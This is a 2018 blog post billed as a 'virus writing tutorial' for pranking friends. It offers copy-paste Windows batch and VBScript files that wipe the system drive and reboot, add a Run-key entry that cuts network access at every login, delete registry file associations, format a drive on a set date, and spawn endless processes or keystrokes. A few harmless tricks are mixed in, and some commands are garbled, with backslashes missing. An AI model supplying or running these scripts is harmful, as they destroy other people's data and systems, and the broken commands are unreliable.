Header Ads

You Have To See This Virus Writing Tutorial



Just Prank Your Fucking Friends

IMP. Note» I am not responsible for any damage or error reporting in Your pc do it on your own risk. This coding is only for knowledge purpose.

All Scripts Here Are To Be Copied In Note Pad

1. This Virus Deletes All The Content Of A Drive…

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code in a .bat file

2. Disable Internet Permanently

Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off»c:windowswimn32.bat
echo ipconfig/release_all»c:windowswimn32.bat
echo end»c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

3.The Most Simple Virus To Crush The Window

@Echo off
Del C:\ *.* |y

Save It As Anything.bat

4.This Will Crash your Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

Save It As Anything.vbs

It Only Works With Windows XP

5.Delete Key Registry Files
[NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE

ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

6.Endless Notepads

This will pop up endless notepads until the computer freezes and crashes

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

7. Bomb Virus

Copy Paste The Following

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit

And Save It As Anything.bat

Note:- You Can Change The Date ( 2018/05/26) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day

8.Crazy caps lock

This constantly turns caps lock on and off really fast continuously

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

9.Endless Enter

This constantly makes it so the enter button is being pressed continuesly

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

10. Endless Backspace

This makes it so the backspace key is constantly being pressed

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


What sex is your computer ?

-> open notepad
-> copy code

CreateObject(“SAPI.SpVoice”).Speak”I love YOU”

-> n paste on the Notepad
-> save as > love.vbs
-> double-click on it

Make Your Keyboard Disco Light

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1. This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

2. This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop

Instructions:
√ paste any of the two above codes in notepad
√ Save as “AnyFileName”.vbs
√ Run the file
√ To stop, launch task manager and then under “Processes” end “wscript.exe”



I hope you would like it..

You Have To See This Virus Writing Tutorial You Have To See This Virus Writing Tutorial Reviewed by Pezziny Jossboss on May 26, 2018 Rating: 5

1 comment:

  1. Wow thanks alot this would help a lot as I have planned to learn a lot under hacking. Very useful info.

    ReplyDelete

Show your Contribution

Ad Home

Ready to Learn?


Are you interested in learning digital marketing from Beginners Level to become a professional in offering digtial services? if Yes please click link below to learn all.


DIGITAL MARKETING BASICS
Powered by Blogger.